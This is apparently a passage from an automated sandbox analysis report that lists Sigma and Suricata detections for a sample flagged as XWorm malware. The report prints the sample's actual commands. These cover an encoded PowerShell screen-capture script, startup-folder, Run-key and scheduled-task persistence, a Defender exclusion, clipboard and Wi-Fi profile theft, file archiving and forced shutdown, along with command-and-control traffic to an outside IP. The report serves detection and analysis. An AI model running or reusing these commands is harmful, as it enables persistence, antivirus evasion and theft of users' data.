'C:\Users\user\AppData\Local\Temp\bound.exe', ProcessId: 7292, ProcessName: powershell.exe

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\sB2ClgrGng.exe, ProcessId: 2892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\word.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bound.exe, ProcessId: 7280, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\word

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7872, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: SCR File Write Event

Source: File created

Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\sB2ClgrGng.exe, ProcessId: 2892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\sB2ClgrGng.exe, ProcessId: 2892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: bound.exe, ParentImage: C:\Users\user\AppData\Local\Temp\bound.exe, ParentProcessId: 7280, ParentProcessName: bound.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe", ProcessId: 7076, ProcessName: schtasks.exe

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Sigma detected: Suspicious Execution of Shutdown

Source: Process started

Author: frack113: Data: Command: shutdown.exe /f /s /t 0, CommandLine: shutdown.exe /f /s /t 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\shutdown.exe, NewProcessName: C:\Windows\System32\shutdown.exe, OriginalFileName: C:\Windows\System32\shutdown.exe, ParentCommandLine: bound.exe, ParentImage: C:\Users\user\AppData\Local\Temp\bound.exe, ParentProcessId: 7280, ParentProcessName: bound.exe, ProcessCommandLine: shutdown.exe /f /s /t 0, ProcessId: 8592, ProcessName: shutdown.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Suspicious Screensaver Binary File Creation

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\sB2ClgrGng.exe, ProcessId: 2892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8556, TargetFilename: C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline

Sigma detected: Files Added To An Archive Using Rar.EXE

Source: Process started

Author: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5592, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *, ProcessId: 7600, ProcessName: rar.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4248, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe', ProcessId: 7188, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7336, ProcessName: svchost.exe

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKA

Stealing of Sensitive Information

Sigma detected: Capture Wi-Fi password

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 8056, ProcessName: cmd.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-13T19:01:24.479459+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:29.477991+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:34.477345+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:38.262957+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:39.383490+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:39.477201+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:44.477352+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:49.477446+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:53.095707+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:54.477904+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:01:59.597150+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:04.480484+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:07.939520+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:09.399936+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:09.531652+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:14.476395+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:19.477476+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:22.782245+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:24.475901+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:28.830663+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:29.476294+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:34.476312+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:39.411926+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:39.501106+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:40.922459+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:41.719945+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:41.830435+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:44.476284+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:49.475644+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:51.031873+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:51.414778+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:51.607964+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:51.613038+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:54.475851+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:02:59.475736+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:01.578611+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:04.491278+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:07.078619+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:07.167155+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:07.262861+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:09.428549+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:09.560616+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
2024-10-13T19:03:14.491843+0200	2852870	1	Malware Command and Control Activity Detected	198.23.219.104	7000	192.168.2.4	49739	TCP
